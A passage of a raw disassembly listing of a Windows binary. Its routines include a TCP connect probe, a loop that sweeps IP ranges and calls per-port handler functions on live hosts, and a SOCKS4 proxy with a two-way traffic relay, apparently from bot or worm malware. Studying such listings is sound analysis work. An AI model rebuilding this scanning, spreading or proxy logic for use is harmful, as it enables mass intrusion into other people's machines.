		cmp	ecx, ebp
		jnz	short loc_413C5B
		or	esi, 300h
		jmp	short loc_413C5B
; ---------------------------------------------------------------------------

loc_413C4D:				; CODE XREF: sub_413A67+1D8j
		or	esi, 200h
		jmp	short loc_413C5B
; ---------------------------------------------------------------------------

loc_413C55:				; CODE XREF: sub_413A67+1D0j
		or	esi, 100h

loc_413C5B:				; CODE XREF: sub_413A67+1C8j
					; sub_413A67+1DCj ...
		mov	ebx, 8040h
		and	eax, ebx
		sub	eax, 40h
		jz	short loc_413C83
		sub	eax, 7FC0h
		jz	short loc_413C7B
		sub	eax, 40h
		jnz	short loc_413C89
		or	esi, 1000000h
		jmp	short loc_413C89
; ---------------------------------------------------------------------------

loc_413C7B:				; CODE XREF: sub_413A67+205j
		or	esi, 3000000h
		jmp	short loc_413C89
; ---------------------------------------------------------------------------

loc_413C83:				; CODE XREF: sub_413A67+1FEj
		or	esi, 2000000h

loc_413C89:				; CODE XREF: sub_413A67+20Aj
					; sub_413A67+212j ...
		mov	edx, edi
		and	edi, [esp+20h+arg_0]
		not	edx
		and	edx, esi
		or	edx, edi
		cmp	edx, esi
		jnz	short loc_413CA0
		mov	eax, esi
		jmp	loc_413D4B
; ---------------------------------------------------------------------------

loc_413CA0:				; CODE XREF: sub_413A67+230j
		call	sub_4139C7
		push	eax
		mov	[esp+24h+arg_4], eax
		call	sub_41069A
		pop	ecx
		stmxcsr	[esp+20h+arg_4]
		mov	eax, [esp+20h+arg_4]
		xor	edx, edx
		test	al, al
		jns	short loc_413CC2
		push	10h
		pop	edx

loc_413CC2:				; CODE XREF: sub_413A67+256j
		mov	edi, 200h
		test	eax, edi
		jz	short loc_413CCE
		or	edx, 8

loc_413CCE:				; CODE XREF: sub_413A67+262j
		test	ax, 400h
		jz	short loc_413CD7
		or	edx, 4

loc_413CD7:				; CODE XREF: sub_413A67+26Bj
		test	ax, 800h
		jz	short loc_413CE0
		or	edx, 2

loc_413CE0:				; CODE XREF: sub_413A67+274j
		test	ax, 1000h
		jz	short loc_413CE9
		or	edx, 1

loc_413CE9:				; CODE XREF: sub_413A67+27Dj
		mov	esi, 100h
		test	eax, esi
		jz	short loc_413CF8
		or	edx, 80000h

loc_413CF8:				; CODE XREF: sub_413A67+289j
		mov	ecx, eax
		and	ecx, ebp
		jz	short loc_413D20
		cmp	ecx, 2000h
		jz	short loc_413D1E
		cmp	ecx, 4000h
		jz	short loc_413D1A
		cmp	ecx, ebp
		jnz	short loc_413D20
		or	edx, 300h
		jmp	short loc_413D20
; ---------------------------------------------------------------------------

loc_413D1A:				; CODE XREF: sub_413A67+2A5j
		or	edx, edi
		jmp	short loc_413D20
; ---------------------------------------------------------------------------

loc_413D1E:				; CODE XREF: sub_413A67+29Dj
		or	edx, esi

loc_413D20:				; CODE XREF: sub_413A67+295j
					; sub_413A67+2A9j ...
		and	eax, ebx
		sub	eax, 40h
		jz	short loc_413D43
		sub	eax, 7FC0h
		jz	short loc_413D3B
		sub	eax, 40h
		jnz	short loc_413D49
		or	edx, 1000000h
		jmp	short loc_413D49
; ---------------------------------------------------------------------------

loc_413D3B:				; CODE XREF: sub_413A67+2C5j
		or	edx, 3000000h
		jmp	short loc_413D49
; ---------------------------------------------------------------------------

loc_413D43:				; CODE XREF: sub_413A67+2BEj
		or	edx, 2000000h

loc_413D49:				; CODE XREF: sub_413A67+2CAj
					; sub_413A67+2D2j ...
		mov	eax, edx

loc_413D4B:				; CODE XREF: sub_413A67+234j
		mov	ecx, [esp+20h+var_4]
		mov	edx, eax
		xor	edx, ecx
		or	eax, ecx
		test	edx, 8031Fh
		jz	short loc_413D62
		or	eax, 80000000h

loc_413D62:				; CODE XREF: sub_413A67+16Fj
					; sub_413A67+2F4j
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		add	esp, 10h
		retn
sub_413A67	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_413D6A	proc near		; CODE XREF: sub_4129AD+326p

var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 18h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_8]
		push	ebx
		push	esi
		xor	esi, esi
		cmp	[ebp+arg_4], esi
		push	edi
		mov	[ebp+var_18], 404Eh
		mov	[eax], esi
		mov	[eax+4], esi
		mov	[eax+8], esi
		jbe	loc_413EE0

loc_413D9A:				; CODE XREF: sub_413D6A+146j
		mov	edx, [eax]
		mov	ebx, [eax+4]
		mov	esi, eax
		lea	edi, [ebp+var_10]
		movsd
		movsd
		movsd
		mov	ecx, edx
		shr	ecx, 1Fh
		lea	edi, [edx+edx]
		lea	edx, [ebx+ebx]
		or	edx, ecx
		mov	ecx, [eax+8]
		mov	esi, ebx
		shr	esi, 1Fh
		add	ecx, ecx
		or	ecx, esi
		mov	[ebp+var_14], edi
		mov	esi, edi
		and	[ebp+var_14], 0
		mov	ebx, edx
		shr	ebx, 1Fh
		add	ecx, ecx
		shr	edi, 1Fh
		or	ecx, ebx
		mov	ebx, [ebp+var_10]
		add	esi, esi
		add	edx, edx
		or	edx, edi
		lea	edi, [esi+ebx]
		cmp	edi, esi
		mov	[eax], esi
		mov	[eax+4], edx
		mov	[eax+8], ecx
		jb	short loc_413DF1
		cmp	edi, ebx
		jnb	short loc_413DF8

loc_413DF1:				; CODE XREF: sub_413D6A+81j
		mov	[ebp+var_14], 1

loc_413DF8:				; CODE XREF: sub_413D6A+85j
		xor	ebx, ebx
		cmp	[ebp+var_14], ebx
		mov	[eax], edi
		jz	short loc_413E1B
		lea	esi, [edx+1]
		cmp	esi, edx
		jb	short loc_413E0D
		cmp	esi, 1
		jnb	short loc_413E10

loc_413E0D:				; CODE XREF: sub_413D6A+9Cj
		xor	ebx, ebx
		inc	ebx

loc_413E10:				; CODE XREF: sub_413D6A+A1j
		test	ebx, ebx
		mov	[eax+4], esi
		jz	short loc_413E1B
		inc	ecx
		mov	[eax+8], ecx

loc_413E1B:				; CODE XREF: sub_413D6A+95j
					; sub_413D6A+ABj
		mov	ecx, [eax+4]
		mov	edx, [ebp+var_C]
		lea	ebx, [ecx+edx]
		xor	esi, esi
		cmp	ebx, ecx
		jb	short loc_413E2E
		cmp	ebx, edx
		jnb	short loc_413E31

loc_413E2E:				; CODE XREF: sub_413D6A+BEj
		xor	esi, esi
		inc	esi

loc_413E31:				; CODE XREF: sub_413D6A+C2j
		test	esi, esi
		mov	[eax+4], ebx
		jz	short loc_413E3B
		inc	dword ptr [eax+8]

loc_413E3B:				; CODE XREF: sub_413D6A+CCj
		mov	ecx, [ebp+var_8]
		add	[eax+8], ecx
		and	[ebp+var_14], 0
		lea	ecx, [edi+edi]
		mov	edx, edi
		shr	edx, 1Fh
		lea	edi, [ebx+ebx]
		or	edi, edx
		mov	edx, [eax+8]
		mov	esi, ebx
		shr	esi, 1Fh
		lea	ebx, [edx+edx]
		mov	edx, [ebp+arg_0]
		or	ebx, esi
		mov	[eax], ecx
		mov	[eax+4], edi
		mov	[eax+8], ebx
		movsx	edx, byte ptr [edx]
		lea	esi, [ecx+edx]
		cmp	esi, ecx
		mov	[ebp+var_10], edx
		jb	short loc_413E7B
		cmp	esi, edx
		jnb	short loc_413E82

loc_413E7B:				; CODE XREF: sub_413D6A+10Bj
		mov	[ebp+var_14], 1

loc_413E82:				; CODE XREF: sub_413D6A+10Fj
		cmp	[ebp+var_14], 0
		mov	[eax], esi
		jz	short loc_413EA6
		lea	ecx, [edi+1]
		xor	edx, edx
		cmp	ecx, edi
		jb	short loc_413E98
		cmp	ecx, 1
		jnb	short loc_413E9B

loc_413E98:				; CODE XREF: sub_413D6A+127j
		xor	edx, edx
		inc	edx

loc_413E9B:				; CODE XREF: sub_413D6A+12Cj
		test	edx, edx
		mov	[eax+4], ecx
		jz	short loc_413EA6
		inc	ebx
		mov	[eax+8], ebx

loc_413EA6:				; CODE XREF: sub_413D6A+11Ej
					; sub_413D6A+136j
		dec	[ebp+arg_4]
		inc	[ebp+arg_0]
		cmp	[ebp+arg_4], 0
		ja	loc_413D9A
		xor	esi, esi
		jmp	short loc_413EE0
; ---------------------------------------------------------------------------

loc_413EBA:				; CODE XREF: sub_413D6A+179j
		mov	ecx, [eax+4]
		mov	edx, ecx
		shr	edx, 10h
		mov	[eax+8], edx
		mov	edx, [eax]
		mov	edi, edx
		shl	ecx, 10h
		shr	edi, 10h
		or	ecx, edi
		shl	edx, 10h
		add	[ebp+var_18], 0FFF0h
		mov	[eax+4], ecx
		mov	[eax], edx

loc_413EE0:				; CODE XREF: sub_413D6A+2Aj
					; sub_413D6A+14Ej
		cmp	[eax+8], esi
		jz	short loc_413EBA
		mov	ebx, 8000h
		test	[eax+8], ebx
		jnz	short loc_413F1F

loc_413EEF:				; CODE XREF: sub_413D6A+1B3j
		mov	esi, [eax]
		mov	edi, [eax+4]
		add	[ebp+var_18], 0FFFFh
		mov	ecx, esi
		add	esi, esi
		shr	ecx, 1Fh
		mov	[eax], esi
		lea	esi, [edi+edi]
		or	esi, ecx
		mov	ecx, [eax+8]
		mov	edx, edi
		shr	edx, 1Fh
		add	ecx, ecx
		or	ecx, edx
		test	ecx, ebx
		mov	[eax+4], esi
		mov	[eax+8], ecx
		jz	short loc_413EEF

loc_413F1F:				; CODE XREF: sub_413D6A+183j
		mov	cx, word ptr [ebp+var_18]
		mov	[eax+0Ah], cx
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
sub_413D6A	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_413F36	proc near		; CODE XREF: sub_4047FC+24p
					; sub_408CAA+10p ...
		jmp	ds:off_41E1B0
sub_413F36	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_413F3C	proc near		; CODE XREF: sub_413FED+14Bp
					; sub_413FED+263p ...

var_128		= dword	ptr -128h
var_124		= dword	ptr -124h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= word ptr -14h
var_12		= word ptr -12h
var_10		= dword	ptr -10h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 128h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	esi
		push	edi
		xor	edi, edi
		push	6
		inc	edi
		push	edi
		push	2
		mov	[ebp+var_18], edi
		call	ds:dword_41E220	; socket
		mov	esi, eax
		cmp	esi, 0FFFFFFFFh
		jnz	short loc_413F6D
		xor	al, al
		jmp	short loc_413FDF
; ---------------------------------------------------------------------------

loc_413F6D:				; CODE XREF: sub_413F3C+2Bj
		push	[ebp+arg_4]
		call	ds:dword_41E270	; htons
		mov	[ebp+var_12], ax
		mov	eax, [ebp+arg_0]
		mov	[ebp+var_10], eax
		lea	eax, [ebp+var_18]
		push	eax
		push	8004667Eh
		push	esi
		mov	[ebp+var_14], 2
		call	ds:dword_41E268	; ioctlsocket
		and	[ebp+var_1C], 0
		push	10h
		lea	eax, [ebp+var_14]
		push	eax
		push	esi
		mov	[ebp+var_20], 5
		mov	[ebp+var_124], esi
		mov	[ebp+var_128], edi
		call	ds:dword_41E23C	; connect
		lea	eax, [ebp+var_20]
		push	eax
		push	0
		lea	eax, [ebp+var_128]
		push	eax
		push	0
		push	0
		call	ds:dword_41E254	; select
		push	esi
		mov	edi, eax
		call	ds:dword_41E280	; closesocket
		test	edi, edi
		setnle	al

loc_413FDF:				; CODE XREF: sub_413F3C+2Fj
		mov	ecx, [ebp+var_4]
		pop	edi
		xor	ecx, ebp
		pop	esi
		call	sub_402C9E
		leave
		retn
sub_413F3C	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: noreturn bp-based	frame


sub_413FED	proc near		; DATA XREF: sub_4024A4+4E3o

var_25C		= dword	ptr -25Ch
var_258		= dword	ptr -258h
var_254		= dword	ptr -254h
var_250		= dword	ptr -250h
var_24C		= dword	ptr -24Ch
var_248		= dword	ptr -248h
var_244		= dword	ptr -244h
var_240		= byte ptr -240h
var_140		= dword	ptr -140h
var_13C		= dword	ptr -13Ch
var_138		= dword	ptr -138h
var_134		= byte ptr -134h
var_130		= byte ptr -130h
var_30		= byte ptr -30h
var_20		= byte ptr -20h
var_1E		= byte ptr -1Eh
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 25Ch
		mov	eax, dword_424064
		xor	eax, esp
		mov	[esp+25Ch+var_4], eax
		push	ebx
		push	esi
		mov	esi, [ebp+arg_0]
		push	edi
		push	49h
		pop	ecx
		lea	edi, [esp+268h+var_130]
		rep movsd

loc_414019:				; CODE XREF: sub_413FED+528j
					; sub_413FED+539j
		lea	eax, [esp+268h+var_250]
		push	eax
		lea	eax, [esp+26Ch+var_254]
		push	eax
		lea	eax, [esp+270h+var_258]
		push	eax
		lea	eax, [esp+274h+var_25C]
		push	eax
		or	edi, 0FFFFFFFFh
		lea	eax, [esp+278h+var_30]
		push	offset dword_41FF1C
		push	eax
		mov	[esp+280h+var_25C], edi
		mov	[esp+280h+var_258], edi
		mov	[esp+280h+var_254], edi
		mov	[esp+280h+var_250], edi
		call	sub_403B72
		add	esp, 18h
		cmp	[esp+268h+var_1E], 0
		jz	short loc_4140A7
		cmp	[esp+268h+var_25C], edi
		mov	esi, 0FEh
		jnz	short loc_414077
		mov	eax, esi
		xor	ebx, ebx
		call	sub_419F47
		mov	[esp+268h+var_25C], eax

loc_414077:				; CODE XREF: sub_413FED+7Bj
		cmp	[esp+268h+var_258], edi
		jnz	short loc_41408A
		mov	eax, esi
		xor	ebx, ebx
		call	sub_419F47
		mov	[esp+268h+var_258], eax

loc_41408A:				; CODE XREF: sub_413FED+8Ej
		cmp	[esp+268h+var_254], edi
		jnz	short loc_41409D
		mov	eax, esi
		xor	ebx, ebx
		call	sub_419F47
		mov	[esp+268h+var_254], eax

loc_41409D:				; CODE XREF: sub_413FED+A1j
		mov	eax, [esp+268h+var_250]
		cmp	eax, edi
		jnz	short loc_4140F9
		jmp	short loc_4140D2
; ---------------------------------------------------------------------------

loc_4140A7:				; CODE XREF: sub_413FED+70j
		mov	eax, [esp+268h+var_18]
		sub	eax, 0
		jz	short loc_4140E1
		dec	eax
		jz	short loc_4140C0
		dec	eax
		jnz	short loc_4140F5
		mov	eax, 0FEh
		jmp	short loc_4140D4
; ---------------------------------------------------------------------------

loc_4140C0:				; CODE XREF: sub_413FED+C7j
		mov	esi, 0FEh

loc_4140C5:				; CODE XREF: sub_413FED+106j
		mov	eax, esi
		xor	ebx, ebx
		call	sub_419F47
		mov	[esp+268h+var_254], eax

loc_4140D2:				; CODE XREF: sub_413FED+B8j
		mov	eax, esi

loc_4140D4:				; CODE XREF: sub_413FED+D1j
		xor	ebx, ebx
		call	sub_419F47
		mov	[esp+268h+var_250], eax
		jmp	short loc_4140F9
; ---------------------------------------------------------------------------

loc_4140E1:				; CODE XREF: sub_413FED+C4j
		mov	esi, 0FEh
		mov	eax, esi
		xor	ebx, ebx
		call	sub_419F47
		mov	[esp+268h+var_258], eax
		jmp	short loc_4140C5
; ---------------------------------------------------------------------------

loc_4140F5:				; CODE XREF: sub_413FED+CAj
		mov	eax, [esp+268h+var_250]

loc_4140F9:				; CODE XREF: sub_413FED+B6j
					; sub_413FED+F2j
		shl	eax, 8
		add	eax, [esp+268h+var_254]
		shl	eax, 8
		add	eax, [esp+268h+var_258]
		shl	eax, 8
		add	eax, [esp+268h+var_25C]
		mov	[esp+268h+var_14], eax
		mov	eax, [esp+268h+var_1C]
		cmp	eax, edi
		jnz	loc_41431C
		xor	ebx, ebx
		mov	[esp+268h+var_248], ebx
		mov	eax, offset dword_425548

loc_41412F:				; CODE XREF: sub_413FED+169j
		push	dword ptr [eax]
		push	[esp+26Ch+var_14]
		call	sub_413F3C
		test	al, al
		pop	ecx
		pop	ecx
		jnz	short loc_41415D
		inc	ebx
		mov	eax, ebx
		imul	eax, 2Ch
		lea	eax, dword_425548[eax]
		cmp	dword ptr [eax], 0
		mov	[esp+268h+var_248], ebx
		jnz	short loc_41412F
		jmp	loc_414506
; ---------------------------------------------------------------------------

loc_41415D:				; CODE XREF: sub_413FED+154j
		push	110h
		lea	eax, [esp+26Ch+var_240]
		push	0
		push	eax
		call	sub_408130
		add	esp, 0Ch
		lea	eax, [esp+268h+var_130]
		push	eax
		push	offset byte_41FF28
		lea	eax, [esp+270h+var_240]
		push	0FFh
		push	eax
		call	sub_40307C
		lea	eax, [esp+278h+var_240]
		add	esp, 10h
		lea	esi, [eax+1]

loc_414197:				; CODE XREF: sub_413FED+1AFj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_414197
		sub	eax, esi
		mov	[esp+eax+268h+var_240],	cl
		mov	eax, [esp+268h+var_14]
		mov	[esp+268h+var_140], ebx
		imul	ebx, 2Ch
		mov	[esp+268h+var_13C], eax
		mov	eax, dword_425548[ebx]
		sub	esp, 110h
		mov	[esp+378h+var_138], eax
		mov	al, [esp+378h+var_20]
		push	44h
		pop	ecx
		mov	[esp+378h+var_134], al
		lea	esi, [esp+378h+var_240]
		mov	edi, esp
		rep movsd
		call	off_425550[ebx]
		mov	esi, [esp+378h+var_250]
		shl	esi, 8
		add	esi, [esp+378h+var_254]
		add	esp, 110h
		shl	esi, 8
		add	esi, [esp+268h+var_258]
		mov	[esp+268h+var_24C], 100h
		shl	esi, 8
		add	esi, [esp+268h+var_25C]
		mov	[esp+268h+var_244], esi

loc_414222:				; CODE XREF: sub_413FED+324j
		mov	eax, [esp+268h+var_24C]
		mov	ecx, [esp+268h+var_254]
		add	eax, ecx
		shl	eax, 8
		add	eax, [esp+268h+var_258]
		shl	eax, 8
		add	eax, [esp+268h+var_25C]
		cmp	eax, esi
		mov	[esp+268h+var_14], eax
		jz	loc_414301
		push	dword_425548[ebx]
		push	eax
		call	sub_413F3C
		test	al, al
		pop	ecx
		pop	ecx
		jz	loc_414301
		push	110h
		lea	eax, [esp+26Ch+var_240]
		push	0
		push	eax
		call	sub_408130
		add	esp, 0Ch
		lea	eax, [esp+268h+var_130]
		push	eax
		push	offset byte_41FF2C
		lea	eax, [esp+270h+var_240]
		push	0FFh
		push	eax
		call	sub_40307C
		lea	eax, [esp+278h+var_240]
		add	esp, 10h
		lea	esi, [eax+1]

loc_414299:				; CODE XREF: sub_413FED+2B1j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_414299
		sub	eax, esi
		mov	[esp+eax+268h+var_240],	cl
		mov	eax, [esp+268h+var_14]
		mov	[esp+268h+var_13C], eax
		mov	eax, [esp+268h+var_248]
		mov	[esp+268h+var_140], eax
		mov	eax, dword_425548[ebx]
		sub	esp, 110h
		mov	[esp+378h+var_138], eax
		mov	al, [esp+378h+var_20]
		push	44h
		pop	ecx
		mov	[esp+378h+var_134], al
		lea	esi, [esp+378h+var_240]
		mov	edi, esp
		rep movsd
		call	off_425550[ebx]
		mov	esi, [esp+378h+var_244]
		add	esp, 110h

loc_414301:				; CODE XREF: sub_413FED+256j
					; sub_413FED+26Cj
		add	[esp+268h+var_24C], 100h
		cmp	[esp+268h+var_24C], 0FE00h
		jle	loc_414222
		jmp	loc_414501
; ---------------------------------------------------------------------------

loc_41431C:				; CODE XREF: sub_413FED+131j
		imul	eax, 2Ch
		push	dword_425548[eax]
		push	[esp+26Ch+var_14]
		call	sub_413F3C
		test	al, al
		pop	ecx
		pop	ecx
		jz	loc_414506
		push	110h
		lea	eax, [esp+26Ch+var_240]
		push	0
		push	eax
		call	sub_408130
		add	esp, 0Ch
		lea	eax, [esp+268h+var_130]
		push	eax
		push	offset dword_41FF30
		lea	eax, [esp+270h+var_240]
		push	0FFh
		push	eax
		call	sub_40307C
		lea	eax, [esp+278h+var_240]
		add	esp, 10h
		lea	ecx, [eax+1]

loc_414375:				; CODE XREF: sub_413FED+38Dj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_414375
		sub	eax, ecx
		mov	[esp+eax+268h+var_240],	dl
		mov	eax, [esp+268h+var_14]
		mov	[esp+268h+var_13C], eax
		mov	eax, [esp+268h+var_1C]
		mov	[esp+268h+var_140], eax
		imul	eax, 2Ch
		mov	ecx, dword_425548[eax]
		mov	[esp+268h+var_138], ecx
		mov	cl, [esp+268h+var_20]
		sub	esp, 110h
		mov	[esp+378h+var_134], cl
		push	44h
		pop	ecx
		lea	esi, [esp+378h+var_240]
		mov	edi, esp
		rep movsd
		call	off_425550[eax]
		mov	ebx, [esp+378h+var_250]
		shl	ebx, 8
		add	ebx, [esp+378h+var_254]
		add	esp, 110h
		shl	ebx, 8
		add	ebx, [esp+268h+var_258]
		mov	[esp+268h+var_24C], 100h
		shl	ebx, 8
		add	ebx, [esp+268h+var_25C]

loc_414403:				; CODE XREF: sub_413FED+50Ej
		mov	eax, [esp+268h+var_24C]
		mov	ecx, [esp+268h+var_254]
		add	eax, ecx
		shl	eax, 8
		add	eax, [esp+268h+var_258]
		shl	eax, 8
		add	eax, [esp+268h+var_25C]
		cmp	eax, ebx
		mov	[esp+268h+var_14], eax
		jz	loc_4144EB
		mov	ecx, [esp+268h+var_1C]
		imul	ecx, 2Ch
		push	dword_425548[ecx]
		push	eax
		call	sub_413F3C
		test	al, al
		pop	ecx
		pop	ecx
		jz	loc_4144EB
		push	110h
		lea	eax, [esp+26Ch+var_240]
		push	0
		push	eax
		call	sub_408130
		add	esp, 0Ch
		lea	eax, [esp+268h+var_130]
		push	eax
		push	offset dword_41FF34
		lea	eax, [esp+270h+var_240]
		push	0FFh
		push	eax
		call	sub_40307C
		lea	eax, [esp+278h+var_240]
		add	esp, 10h
		lea	esi, [eax+1]

loc_414484:				; CODE XREF: sub_413FED+49Cj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_414484
		sub	eax, esi
		mov	[esp+eax+268h+var_240],	cl
		mov	eax, [esp+268h+var_14]
		mov	[esp+268h+var_13C], eax
		mov	eax, [esp+268h+var_1C]
		mov	[esp+268h+var_140], eax
		imul	eax, 2Ch
		mov	ecx, dword_425548[eax]
		mov	[esp+268h+var_138], ecx
		mov	cl, [esp+268h+var_20]
		sub	esp, 110h
		mov	[esp+378h+var_134], cl
		push	44h
		pop	ecx
		lea	esi, [esp+378h+var_240]
		mov	edi, esp
		rep movsd
		call	off_425550[eax]
		add	esp, 110h

loc_4144EB:				; CODE XREF: sub_413FED+437j
					; sub_413FED+457j
		add	[esp+268h+var_24C], 100h
		cmp	[esp+268h+var_24C], 0FE00h
		jle	loc_414403

loc_414501:				; CODE XREF: sub_413FED+32Aj
		call	sub_419F7B

loc_414506:				; CODE XREF: sub_413FED+16Bj
					; sub_413FED+348j
		push	64h
		call	ds:off_41E0F8
		cmp	byte_4294E0, 0
		jnz	loc_414019
		push	2710h
		call	ds:off_41E0F8
		jmp	loc_414019
sub_413FED	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41452B	proc near		; CODE XREF: sub_41463A+144p

var_508		= dword	ptr -508h
var_504		= dword	ptr -504h
var_500		= dword	ptr -500h
var_404		= byte ptr -404h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 508h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		mov	ebx, ds:dword_41E26C
		push	esi
		push	edi
		xor	edi, edi
		mov	esi, 400h

loc_41454E:				; CODE XREF: sub_41452B+CCj
					; sub_41452B+FAj
		mov	eax, [ebp+arg_4]
		xor	ecx, ecx
		inc	ecx
		mov	[ebp+var_504], eax
		mov	[ebp+var_508], ecx
		xor	eax, eax

loc_414562:				; CODE XREF: sub_41452B+46j
		mov	edx, [ebp+arg_0]
		cmp	[ebp+eax*4+var_504], edx
		jz	short loc_414573
		inc	eax
		cmp	eax, ecx
		jb	short loc_414562

loc_414573:				; CODE XREF: sub_41452B+41j
		cmp	eax, ecx
		jnz	short loc_414587
		mov	[ebp+var_500], edx
		mov	[ebp+var_508], 2

loc_414587:				; CODE XREF: sub_41452B+4Aj
		push	esi
		lea	eax, [ebp+var_404]
		push	edi
		push	eax
		call	sub_408130
		add	esp, 0Ch
		push	edi
		push	edi
		push	edi
		lea	eax, [ebp+var_508]
		push	eax
		push	edi
		call	ds:dword_41E254	; select
		lea	eax, [ebp+var_508]
		push	eax
		push	[ebp+arg_4]
		call	sub_402BCA	; __WSAFDIsSet
		test	eax, eax
		jz	short loc_4145E6
		push	edi
		push	esi
		lea	eax, [ebp+var_404]
		push	eax
		push	[ebp+arg_4]
		call	ebx	; recv
		cmp	eax, 0FFFFFFFFh
		jz	short loc_41462B
		push	edi
		push	eax
		lea	eax, [ebp+var_404]
		push	eax
		push	[ebp+arg_0]
		call	ds:dword_41E228	; send
		cmp	eax, 0FFFFFFFFh
		jz	short loc_41462B

loc_4145E6:				; CODE XREF: sub_41452B+8Fj
		lea	eax, [ebp+var_508]
		push	eax
		push	[ebp+arg_0]
		call	sub_402BCA	; __WSAFDIsSet
		test	eax, eax
		jz	loc_41454E
		push	edi
		push	esi
		lea	eax, [ebp+var_404]
		push	eax
		push	[ebp+arg_0]
		call	ebx	; recv
		cmp	eax, 0FFFFFFFFh
		jz	short loc_41462B
		push	edi
		push	eax
		lea	eax, [ebp+var_404]
		push	eax
		push	[ebp+arg_4]
		call	ds:dword_41E228	; send
		cmp	eax, 0FFFFFFFFh
		jnz	loc_41454E

loc_41462B:				; CODE XREF: sub_41452B+A2j
					; sub_41452B+B9j ...
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
sub_41452B	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41463A	proc near		; DATA XREF: sub_4147B2+189o

var_530		= dword	ptr -530h
var_52C		= dword	ptr -52Ch
var_528		= dword	ptr -528h
var_524		= dword	ptr -524h
var_420		= word ptr -420h
var_41E		= word ptr -41Eh
var_41C		= dword	ptr -41Ch
var_414		= byte ptr -414h
var_410		= byte ptr -410h
var_40F		= byte ptr -40Fh
var_40E		= word ptr -40Eh
var_40C		= dword	ptr -40Ch
var_404		= byte ptr -404h
var_403		= byte ptr -403h
var_3FC		= byte ptr -3FCh
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 534h
		mov	eax, dword_424064
		xor	eax, esp
		mov	[esp+534h+var_4], eax
		push	ebx
		push	esi
		mov	esi, [ebp+arg_0]
		push	edi
		xor	ebx, ebx
		lea	eax, [esp+540h+var_530]
		push	eax
		push	ebx
		push	ebx
		lea	eax, [esp+54Ch+var_528]
		push	eax
		push	ebx
		mov	[esp+554h+var_530], 14h
		mov	[esp+554h+var_52C], ebx
		mov	[esp+554h+var_524], esi
		mov	[esp+554h+var_528], 1
		call	ds:dword_41E254	; select
		test	eax, eax
		jz	loc_414785
		push	ebx
		push	408h
		lea	eax, [esp+548h+var_410]
		push	eax
		push	esi
		call	ds:dword_41E26C	; recv
		test	eax, eax
		jle	loc_414785
		cmp	[esp+540h+var_410], 4
		jnz	loc_414785
		cmp	[esp+540h+var_40F], 1
		jnz	loc_414785
		xor	eax, eax
		lea	edi, [esp+540h+var_420]
		stosd
		stosd
		stosd
		stosd
		mov	ax, [esp+540h+var_40E]
		push	6
		mov	[esp+544h+var_41E], ax
		mov	eax, [esp+544h+var_40C]
		push	1
		push	2
		mov	[esp+54Ch+var_420], 2
		mov	[esp+54Ch+var_41C], eax
		call	ds:dword_41E220	; socket
		mov	edi, eax
		push	10h
		lea	eax, [esp+538h+var_414]
		push	eax
		push	edi
		call	ds:dword_41E23C	; connect
		push	400h
		cmp	eax, 0FFFFFFFFh
		push	ebx
		lea	eax, [esp+53Ch+var_3FC]
		mov	[esp+53Ch+var_404], bl
		push	eax
		jnz	short loc_41475A
		mov	[esp+540h+var_403], 5Bh
		call	sub_408130
		add	esp, 0Ch
		push	ebx
		push	8
		lea	eax, [esp+53Ch+var_404]
		push	eax
		push	esi
		call	ds:dword_41E228	; send
		jmp	short loc_414785
; ---------------------------------------------------------------------------

loc_41475A:				; CODE XREF: sub_41463A+FAj
		mov	[esp+540h+var_403], 5Ah
		call	sub_408130
		add	esp, 0Ch
		push	ebx
		push	8
		lea	eax, [esp+53Ch+var_404]
		push	eax
		push	esi
		call	ds:dword_41E228	; send
		push	esi
		push	edi
		call	sub_41452B
		pop	ecx
		pop	ecx

loc_414785:				; CODE XREF: sub_41463A+4Fj
					; sub_41463A+6Cj ...
		push	esi
		call	ds:dword_41E280	; closesocket
		call	ds:dword_41E0DC	; GetCurrentThreadId
		push	eax
		call	sub_414CA5
		pop	ecx
		mov	ecx, [esp+540h+var_4]
		pop	edi
		pop	esi
		pop	ebx
		xor	ecx, esp
		xor	eax, eax
		call	sub_402C9E
		mov	esp, ebp
		pop	ebp
		retn	4
sub_41463A	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4147B2	proc near		; DATA XREF: sub_401EF9+139o

var_130		= byte ptr -130h
var_24		= byte ptr -24h
